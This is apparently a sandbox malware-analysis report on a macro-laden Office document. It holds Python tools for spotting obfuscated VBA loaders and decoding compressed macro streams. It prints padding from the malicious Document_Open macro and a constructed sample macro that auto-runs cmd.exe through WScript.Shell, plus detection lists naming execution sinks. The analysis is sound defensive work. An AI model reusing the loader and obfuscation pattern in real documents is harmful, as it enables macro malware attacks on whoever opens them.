Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a Microsoft Office document carrying an obfuscated VBA macro that runs from the Document_Open auto-execution event. The visible source is padded with junk StrReverse/Replace assignments inside loops and with If branches whose conditions can never be true; the analyzer's critical heuristics (a Shell() call and an obfuscated auto-exec loader) indicate that the real strings are reconstructed at run time and passed to an execution sink, consistent with a loader that downloads and executes a second-stage payload. ClamAV independently detects the file as Doc.Malware.Chronos-6897935-0.
Heuristics (7)

- critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0.
- medium | OLE_VBA_MACROS | VBA macros detected (4 related findings): the document contains VBA macro code.
- critical | OLE_VBA_SHELL | Shell() call in VBA.
- critical | OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER | Obfuscated auto-exec VBA loader: an auto-exec routine reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source, so plain string matching on the source misses them.
- high | OLE_VBA_DOCOPEN | Document_Open macro: the code runs automatically when the document is opened, with no user action beyond enabling macros.
- high | OLE_VBA_PCODE_AUTOEXEC_EXEC | VBA p-code auto-exec with execution tokens: the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
- info | EMBEDDED_URL | Embedded URLs: one or more URLs were extracted from the document. A URL is not a detection by itself; the per-URL label names the channel (macro, JS, link annotation, document body, ...) that reached it. All eight URLs below are XML namespace identifiers (XMP, RDF, Dublin Core, DrawingML) found in the OLE body, i.e. metadata of embedded content, not network indicators.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
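The obfuscated-loader and Document_Open heuristics above describe a shape rather than a signature: an auto-exec entry point, string-rewriting padding, dead branches, and a decoder feeding a sink. The following Python is an added example (not the analyzer's own rules and not code from the page) of how a practitioner can check extracted VBA source for that shape. The macro in SAMPLE_VBA is constructed to mimic the extracted macros.bas (junk StrReverse/Replace assignments in a loop, an always-false If, a Chr() char-array that rebuilds a COM ProgID) and is not the sample's code; the auto-exec and sink name lists, the regexes and the folding rules are illustrative assumptions, and the folder only handles literal-argument Chr/StrReverse/Replace/& chains.

```python
import re

# Constructed sample macro, NOT the page's macros.bas: same shape, invented strings.
SAMPLE_VBA = '''
Private Function fkelbskfbse() As Integer
    fkelbskfbse = 3113 - 434 - 100
End Function
Private Sub Document_Open()
    fbjlz = fkelbskfbse()
    For WCAiQ = 0 To 43
        wAHD = StrReverse("AhQYazmKTMAmYIlgB")
        wAHD = Replace("eETiUOrfLyL", "eET", "WsVo")
    Next WCAiQ
    If 2460080 = 251 - 1030 Then
        WZQFk = StrReverse("yLpJOkMkJuDioloOyR")
    End If
    s = Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
    Set o = CreateObject(s)
    o.Run StrReverse("exe.dmc")
End Sub
'''

# Illustrative name lists (assumption, not the analyzer's real token tables).
AUTOEXEC_RE = re.compile(r'\bSub\s+(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b', re.I)
SINK_RE = re.compile(r'\b(Shell|CreateObject|GetObject)\s*\(|\.(Run|Exec)\b', re.I)
ARG_RE = re.compile(r'^\s*\(?\s*(?:"([^"]*)"|(\w+))')
ASSIGN_LIT_RE = re.compile(r'^\s*(?:Set\s+)?(\w+)\s*=\s*"([^"]*)"\s*$', re.I)
JUNK_ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(?:StrReverse|Replace)\s*\(', re.I)
DEAD_IF_RE = re.compile(r'\bIf\s+(-?\d+)\s*=\s*(-?\d+)\s*-\s*(-?\d+)\s+Then', re.I)
CHR_RE = re.compile(r'\bChr\(\s*(\d+)\s*\)', re.I)
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
STRREV_RE = re.compile(r'\bStrReverse\(\s*"([^"]*)"\s*\)', re.I)
REPLACE_RE = re.compile(r'\bReplace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)', re.I)


def _chr(m):
    n = int(m.group(1))
    # Chr(34) is a double quote and would break the literal regexes; leave it and out-of-range codes alone.
    return m.group(0) if n == 34 or n > 255 else '"%s"' % chr(n)


def fold_strings(line: str) -> str:
    """Statically evaluate Chr()/&/StrReverse()/Replace() on literal arguments until the
    line stops changing. VBA Replace defaults to binary (case-sensitive) compare, like str.replace."""
    prev = None
    while prev != line:
        prev = line
        line = CHR_RE.sub(_chr, line)
        line = CONCAT_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), line)
        line = STRREV_RE.sub(lambda m: '"%s"' % m.group(1)[::-1], line)
        line = REPLACE_RE.sub(lambda m: '"%s"' % m.group(1).replace(m.group(2), m.group(3)), line)
    return line


def analyze(vba: str) -> dict:
    """Report auto-exec entry points, dead branches, junk padding and resolved sink arguments."""
    auto_exec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(vba)})
    dead_branches = 0
    symbols = {}        # variable -> literal value once its right-hand side folds to a string
    sinks = []          # (sink name, resolved argument or "<unresolved:name>")
    junk_assigns = {}   # variable -> number of StrReverse/Replace assignments to it
    for raw in vba.splitlines():
        m = DEAD_IF_RE.search(raw)
        if m and int(m.group(1)) != int(m.group(2)) - int(m.group(3)):
            dead_branches += 1              # "If 2460080 = 251 - 1030" can never be true
        m = JUNK_ASSIGN_RE.match(raw)
        if m:
            junk_assigns[m.group(1)] = junk_assigns.get(m.group(1), 0) + 1
        folded = fold_strings(raw)
        m = ASSIGN_LIT_RE.match(folded)
        if m:
            symbols[m.group(1)] = m.group(2)
        for sm in SINK_RE.finditer(folded):
            am = ARG_RE.match(folded[sm.end():])
            if am is None:
                continue
            if am.group(1) is not None:
                value = am.group(1)
            else:
                value = symbols.get(am.group(2), "<unresolved:%s>" % am.group(2))
            sinks.append((sm.group(1) or sm.group(2), value))
    # A StrReverse/Replace result that is assigned but never read anywhere is padding.
    junk = sum(n for name, n in junk_assigns.items()
               if len(re.findall(r'\b%s\b' % re.escape(name), vba)) == n)
    resolved = [s for s in sinks if not s[1].startswith("<")]
    return {
        "auto_exec": auto_exec,
        "dead_branches": dead_branches,
        "junk_assignments": junk,
        "sinks": sinks,
        "loader_shape": bool(auto_exec) and bool(resolved),
    }


if __name__ == "__main__":
    for k, v in analyze(SAMPLE_VBA).items():
        print(k, "=", v)
```

Run over the constructed macro this resolves CreateObject's argument to "WScript.Shell" and the .Run argument to "cmd.exe", neither of which appears verbatim in the source, which is exactly why the loader heuristic keys on decoder-plus-sink structure rather than on those strings. A real decoder in the wild may use numeric arrays, hex strings or run-time Replace of junk tokens, and may split work across procedures; extend the folding rules rather than the sink list when that happens.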
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38346 bytes | 8b86a6bdea471886e6d9c261f2a80164006635f6a2f100bac9590600f7c2ba0c |
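The "decoded VBA source" in the artifact table is the module source stored in MS-OVBA compressed form, which olevba decompresses, and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above is the fallback for when that path yields nothing. The Python below is an added example, not olevba's or the analyzer's code: a decoder for the MS-OVBA CompressedContainer (section 2.4.1 of the spec, the same algorithm olevba implements), a minimal literal-only encoder used only to build test input, and a simplified token scan over raw bytes standing in for the p-code heuristic. The token lists, the constructed macro, the hand-built copy-token vector and the "stomped" stream are all assumptions made for the example; locating the container inside the module stream (via the dir stream's MODULEOFFSET) is outside this block.

```python
import math

# Illustrative token lists (assumption, not the analyzer's tables).
AUTOEXEC_TOKENS = [b"AutoOpen", b"Auto_Open", b"AutoExec", b"Document_Open", b"Workbook_Open"]
EXEC_TOKENS = [b"Shell", b"CreateObject", b"GetObject", b"URLDownloadToFile", b"WScript.Shell"]


def decompress(container: bytes) -> bytes:
    """Decode an MS-OVBA CompressedContainer into the module's source bytes."""
    if not container or container[0] != 0x01:
        raise ValueError("not a compressed container (missing 0x01 signature)")
    out = bytearray()
    pos = 1
    while pos < len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        chunk_size = (header & 0x0FFF) + 3          # bits 0-11: CompressedChunkSize - 3
        if (header >> 12) & 0x7 != 0b011:           # bits 12-14: fixed signature
            raise ValueError("bad chunk signature at offset %d" % pos)
        compressed = bool(header & 0x8000)          # bit 15: 1 = compressed, 0 = raw
        chunk_end = pos + chunk_size
        chunk_start = len(out)
        pos += 2
        if not compressed:                          # raw chunk: 4096 bytes verbatim
            out += container[pos:pos + 4096]
            pos += 4096
            continue
        while pos < chunk_end:
            flags = container[pos]                  # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:          # literal token: one byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token = int.from_bytes(container[pos:pos + 2], "little")
                pos += 2
                # Offset/length split of the copy token depends on how much of this
                # chunk is already decoded (MS-OVBA 2.4.1.3.19.1), minimum 4 offset bits.
                diff = len(out) - chunk_start
                bit_count = max(4, math.ceil(math.log2(diff))) if diff > 1 else 4
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                src = len(out) - offset
                if src < chunk_start:
                    raise ValueError("copy token reaches before chunk start")
                for _ in range(length):             # byte-wise so overlapping copies work
                    out.append(out[src])
                    src += 1
    return bytes(out)


def compress_literals(source: bytes, per_chunk: int = 3640) -> bytes:
    """Minimal spec-valid encoder emitting only literal tokens (no LZ matching).
    Chunks hold at most 3640 decoded bytes so 2 + n + ceil(n/8) fits the 12-bit size field;
    a real compressor would emit copy tokens or a raw chunk instead. Test input only."""
    container = bytearray(b"\x01")
    for start in range(0, len(source), per_chunk):
        chunk = source[start:start + per_chunk]
        body = b"".join(b"\x00" + chunk[i:i + 8] for i in range(0, len(chunk), 8))
        header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
        container += header.to_bytes(2, "little") + body
    return bytes(container)


def scan_tokens(stream: bytes) -> dict:
    """Simplified stand-in for the p-code heuristic: look for auto-exec and execution
    tokens in raw bytes, in both ASCII and UTF-16LE spellings."""
    def present(tok):
        return tok in stream or tok.decode().encode("utf-16-le") in stream
    found = {
        "autoexec": [t.decode() for t in AUTOEXEC_TOKENS if present(t)],
        "exec": [t.decode() for t in EXEC_TOKENS if present(t)],
    }
    found["suspicious"] = bool(found["autoexec"] and found["exec"])
    return found


def analyze_module(container: bytes) -> dict:
    """Prefer the decoded source; if decoding fails, scan the raw stream bytes."""
    try:
        source = decompress(container)
        return {"source": source, "tokens": scan_tokens(source), "source_ok": True}
    except ValueError:
        return {"source": None, "tokens": scan_tokens(container), "source_ok": False}


# Constructed inputs (not from the sample).
SOURCE = b'Attribute VB_Name = "ThisDocument"\r\nPrivate Sub Document_Open()\r\n  Shell "cmd.exe"\r\nEnd Sub\r\n'
COPY_TOKEN_VECTOR = bytes.fromhex("01 06B0 10 41424344 0130")   # "ABCD" then copy(offset 4, len 4)
STOMPED = b"\x00\xff" + b"\x00" * 16 + "Document_Open".encode("utf-16-le") + b"\x00" * 8 + b"Shell" + b"\x00" * 4

if __name__ == "__main__":
    print(decompress(COPY_TOKEN_VECTOR))
    print(analyze_module(compress_literals(SOURCE))["tokens"])
    print(analyze_module(STOMPED)["tokens"])
```

The hand-built vector exercises the copy-token path (4 literals, then a token whose 4-bit offset field says "go back 4, copy 4"); the stomped stream has a wrecked container header but still carries the identifier strings, which is the situation the p-code heuristic exists for. A source that decodes cleanly and looks benign while the compiled stream carries Shell tokens is the classic VBA-stomping tell and is worth treating as more suspicious, not less.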
Preview script (first 1,000 lines of the extracted script; editor's comments, marked with a leading apostrophe, point out the padding pattern):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Returns 2579; fljkeb is assigned and never read.
Private Function fkelbskfbse() As Integer
fljkeb = "328198"
fbebl = 3113 - 434
fkelbskfbse = fbebl - 100
End Function
' Auto-exec entry point: runs when the document is opened.
Private Sub Document_Open()
fbjlz = fkelbskfbse()
' Junk padding: every wAHD result is overwritten and never used.
For WCAiQ = 0 To 43
wAHD = StrReverse("AhQYazmKTMAmYIlgB")
wAHD = StrReverse("UfjdrVWkKpx")
wAHD = StrReverse("kSCJKPTUIOEyh")
wAHD = Replace("eETiUOrfLyL", "eET", "WsVo")
wAHD = StrReverse("fsOLEgKzmpzMUVUxscE")
' Dead branch: 2460080 can never equal 251 - 1030; same for every If below.
If 2460080 = 251 - 1030 Then
WZQFk = Replace("yLpJOkMkJuDioloOyR", "yLp", "UBdQ")
WZQFk = StrReverse("yLpJOkMkJuDioloOyR")
End If
wAHD = StrReverse("ajovTqhBwihlT")
wAHD = StrReverse("HHATwKBzGpXvJk")
wAHD = StrReverse("iVniFinWKjgizXfl")
wAHD = Replace("fAEIaQdhLYkpHnauo", "fAE", "hIuQ")
wAHD = StrReverse("JeXHjuyaoDgZnwXZPg")
If 914079 = 123 - 5968 Then
gGHdv = Replace("DoltaeVorYyRq", "Dol", "oAdvb")
gGHdv = StrReverse("DoltaeVorYyRq")
rKfOt = Replace("wklGwScLbh", "wkl", "rXckatj")
rKfOt = StrReverse("wklGwScLbh")
End If
wAHD = Replace("GRCyPUfbll", "GRC", "mpDEORX")
wAHD = Replace("BpqHYpYOQuTxsrE", "Bpq", "lOXMB")
wAHD = Replace("fYEfRPhzBcYE", "fYEf", "LtuGLDp")
wAHD = StrReverse("hMhglFXgXLZoAAABF")
wAHD = Replace("CwxoSETPfHo", "Cwxo", "dOpCkJ")
wAHD = StrReverse("ZRaVPcAiwhm")
wAHD = Replace("iLJngfexTayQTGLOloV", "iLJn", "QcdPTz")
If 617267 = 101 - 7641 Then
VsTQR = Replace("JSMfotHPmyPDIwUS", "JSM", "EkJoVfV")
VsTQR = StrReverse("JSMfotHPmyPDIwUS")
End If
wAHD = Replace("fcyLqpennbdgRxcHufF", "fcyL", "xUrlR")
wAHD = StrReverse("UyqriZSgGhaitQ")
wAHD = Replace("ekJvQPBXLGw", "ekJv", "BKejq")
If 991289 = 53 - 2878 Then
xgaUw = Replace("dKaoXSTwLtl", "dKao", "OGcUo")
xgaUw = StrReverse("dKaoXSTwLtl")
End If
wAHD = StrReverse("somGOJzXdbUeGDIgrEY")
Next WCAiQ
If 1659259 = 41 - 3507 Then
MAxcw = Replace("BUzotIEcbHv", "BUz", "yAFOUfO")
MAxcw = StrReverse("BUzotIEcbHv")
afdAl = Replace("xoXgQQHHgXohL", "xoXg", "aCMK")
afdAl = StrReverse("xoXgQQHHgXohL")
End If
qzozUa = StrReverse("sGnDcfwsqwa")
If 2929590 = 135 - 4290 Then
CObTT = Replace("uijpvcMQsZHTh", "uijp", "ZFiLk")
CObTT = StrReverse("uijpvcMQsZHTh")
End If
For nGlQZ = 0 To 182
If 525399 = 51 - 5529 Then
bOrQe = Replace("dWEPHfiMTK", "dWE", "Hptmm")
bOrQe = StrReverse("dWEPHfiMTK")
pwrxZ = Replace("yXXTCgOBHPuneEAEdhW", "yXXT", "qCtWPq")
pwrxZ = StrReverse("yXXTCgOBHPuneEAEdhW")
End If
Egas = StrReverse("WruLHlQERCDGayY")
Egas = StrReverse("OXjsXmWDDreuIFJacAK")
Egas = StrReverse("YrpCihKhVEvVb")
Egas = Replace("fnFGTulUXGCUDb", "fnF", "qGPXR")
If 1023309 = 164 - 4472 Then
QXYzO = Replace("OFoyXyODkpfJxRbMQ", "OFoy", "wFXMfIk")
QXYzO = StrReverse("OFoyXyODkpfJxRbMQ")
End If
Egas = StrReverse("lWALjdrxRErlA")
Egas = StrReverse("clHckpiKsISvunkoKUG")
Egas = StrReverse("CLRGskVgPJbHDiG")
Egas = Replace("qVksszdQke", "qVks", "pnrT")
Egas = Replace("pAnTkifLfSiHbTXtHZ", "pAnT", "WslHhdK")
If 30307 = 5 - 165 Then
nDtRK = Replace("HBKDEVkOyXkqs", "HBK", "Jrcji")
nDtRK = StrReverse("HBKDEVkOyXkqs")
End If
Egas = StrReverse("EQpqyCnoIO")
Egas = StrReverse("hUHEgLOzlKPqMv")
```

... (truncated)